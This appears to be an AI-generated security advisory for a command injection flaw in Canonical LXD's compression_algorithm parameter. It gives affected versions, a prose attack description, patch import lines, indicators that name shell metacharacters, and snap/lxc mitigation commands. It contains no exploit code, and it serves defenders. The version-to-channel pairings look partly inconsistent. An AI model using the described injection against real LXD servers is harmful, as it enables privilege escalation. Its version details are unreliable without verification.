CVE-2026-28384 Overview
CVE-2026-28384 is a critical command injection vulnerability in Canonical LXD that allows an authenticated, unprivileged user to execute arbitrary commands as the LXD daemon on the LXD server. The vulnerability exists due to improper sanitization of the compression_algorithm parameter when making API calls to the image and backup endpoints. Successful exploitation enables an attacker with low-level access to escalate privileges and execute commands with the elevated permissions of the LXD daemon process.
Critical Impact
An authenticated attacker can achieve remote code execution on the LXD server by exploiting improper input sanitization in the compression algorithm parameter, potentially compromising the entire container infrastructure.
Affected Products
- Canonical LXD versions 4.12 through 6.6
- LXD snap versions prior to 5.0.6-e49d9f4 (channel 5.0/stable)
- LXD snap versions prior to 5.21.4-1374f39 (channel 5.21/stable)
- LXD snap versions prior to 6.7-1f11451 (channel 6.0/stable)
Discovery Timeline
- 2026-03-12 - CVE-2026-28384 published to NVD
- 2026-03-12 - Last updated in NVD database
Technical Details for CVE-2026-28384
Vulnerability Analysis
This vulnerability is classified as CWE-78 (OS Command Injection), a severe weakness that occurs when an application constructs OS commands using untrusted input without proper validation or sanitization. In the case of CVE-2026-28384, the LXD daemon fails to adequately validate the compression_algorithm parameter before using it in command execution contexts within the image and backup processing endpoints.
The vulnerability is accessible over the network and requires low attack complexity. While authentication is required, the privileges needed are minimal—an unprivileged authenticated user can exploit this flaw. The impact extends beyond the vulnerable component itself, potentially compromising the confidentiality, integrity, and availability of the host system and other containers managed by the LXD instance.
Root Cause
The root cause of CVE-2026-28384 lies in the absence of proper input validation for the compression_algorithm parameter in the LXD API handlers. The parameter was being passed directly to shell commands without sanitization, allowing attackers to inject malicious command sequences. The fix introduces proper validation by importing and utilizing the validate package from github.com/canonical/lxd/shared/validate to ensure the compression algorithm conforms to expected values before processing.
Attack Vector
An authenticated attacker with access to the LXD API can craft malicious requests to either the image or backup endpoints, injecting shell commands through the compression_algorithm parameter. Since LXD typically runs with elevated privileges to manage containers and system resources, successful command injection results in code execution with daemon-level permissions. This could allow an attacker to escape container isolation, access sensitive data, pivot to other systems, or completely compromise the LXD host.
The attack can be performed remotely over the network against any LXD instance exposing its API, making this particularly dangerous in multi-tenant environments or deployments where containers are managed by multiple users with varying trust levels.
// Security patch introducing validation in lxd/images.go
// Source: https://github.com/canonical/lxd/commit/043696a13171ace7dd4c2b32d34ce039ab629052
"github.com/canonical/lxd/shared/ioprogress"
"github.com/canonical/lxd/shared/logger"
"github.com/canonical/lxd/shared/osarch"
+ "github.com/canonical/lxd/shared/validate"
"github.com/canonical/lxd/shared/version"
)
// Security patch introducing validation in lxd/instance_backup.go
// Source: https://github.com/canonical/lxd/commit/043696a13171ace7dd4c2b32d34ce039ab629052
"github.com/canonical/lxd/shared"
"github.com/canonical/lxd/shared/api"
"github.com/canonical/lxd/shared/entity"
+ "github.com/canonical/lxd/shared/validate"
"github.com/canonical/lxd/shared/version"
)
Detection Methods for CVE-2026-28384
Indicators of Compromise
- Unusual API requests to /1.0/images or backup endpoints containing special characters (;, |, &, $, backticks) in the compression_algorithm parameter
- Unexpected child processes spawned by the LXD daemon process
- Anomalous system commands executed with LXD daemon privileges
- Evidence of container escape or unauthorized access to host resources
Detection Strategies
- Implement API request logging and monitor for malformed or suspicious compression_algorithm values
- Configure SIEM rules to alert on command injection patterns in LXD API traffic
- Deploy runtime application self-protection (RASP) to detect and block command injection attempts
- Monitor LXD daemon process trees for unexpected shell command execution
Monitoring Recommendations
- Enable verbose logging for LXD API endpoints and review logs for injection attempts
- Implement network-level monitoring for LXD API traffic to detect malicious payloads
- Set up file integrity monitoring on LXD binaries and configuration files
- Monitor for privilege escalation attempts from container contexts to the host
How to Mitigate CVE-2026-28384
Immediate Actions Required
- Update LXD to patched versions: 5.0.6-e49d9f4 (5.0/stable), 5.21.4-1374f39 (5.21/stable), or 6.7-1f11451 (6.0/stable)
- Review LXD access controls and remove unnecessary user permissions
- Audit recent API access logs for potential exploitation attempts
- Restrict network access to the LXD API to trusted sources only
Patch Information
Canonical has released security patches addressing this vulnerability across multiple LXD release channels. The fixes introduce proper validation of the compression_algorithm parameter using the validate package before the value is used in command execution contexts. Administrators should update to the following fixed versions:
- Channel 5.0/stable: Version 5.0.6-e49d9f4
- Channel 5.21/stable: Version 5.21.4-1374f39
- Channel 6.0/stable: Version 6.7-1f11451
Note that channel 4.0/stable (version 4.0.10) is not affected by this vulnerability. For detailed patch information, refer to the Ubuntu LXD Remote Code Execution Fixes announcement and the GitHub Security Advisory GHSA-4rmf-rcp8-2r9g.
Workarounds
- Limit LXD API access to only trusted administrators until patches can be applied
- Implement network segmentation to isolate LXD management interfaces
- Use a web application firewall (WAF) or API gateway to filter potentially malicious input patterns
- Disable remote API access if not required and manage LXD locally only
# Verify current LXD version
snap info lxd | grep installed
# Update LXD to the latest patched version
sudo snap refresh lxd --channel=6.0/stable
# Restrict LXD remote access (if not needed)
lxc config set core.https_address ""
# Review current LXD users and their permissions
lxc config trust list
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
